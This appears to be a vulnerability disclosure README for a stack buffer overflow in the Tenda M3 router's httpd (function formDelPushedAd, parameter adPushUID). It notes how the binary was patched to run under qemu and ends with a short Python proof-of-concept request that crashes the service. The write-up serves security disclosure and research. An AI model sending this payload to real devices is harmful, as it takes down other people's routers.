Skip to content

Latest commit

 

History

History

formDelPushedAd

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Tenda M3 contains Stack Buffer Overflow Vulnerability

overview

Description

1. Vulnerability Details

the httpd in directory /bin has a buffer overflow. The vunlerability is in fucntion formDelPushedAd

image-20220819154414020

In this function, it copies POST parameter adPushUID to stack buffer v6

If s is too long, it will causes dos(deny of service)

2. Recurring loopholes and POC

use qemu-arm-static to run the httpd, we need to patch it before run.

  • in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
  • The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data = {
    "adPushUID": "a"*0x2000
}
cookies = {
    "user": "admin"
}
res = requests.post("http://127.0.0.1/goform/delPushedAd", data=data, cookies=cookies)
print(res.content)

image-20220819154611001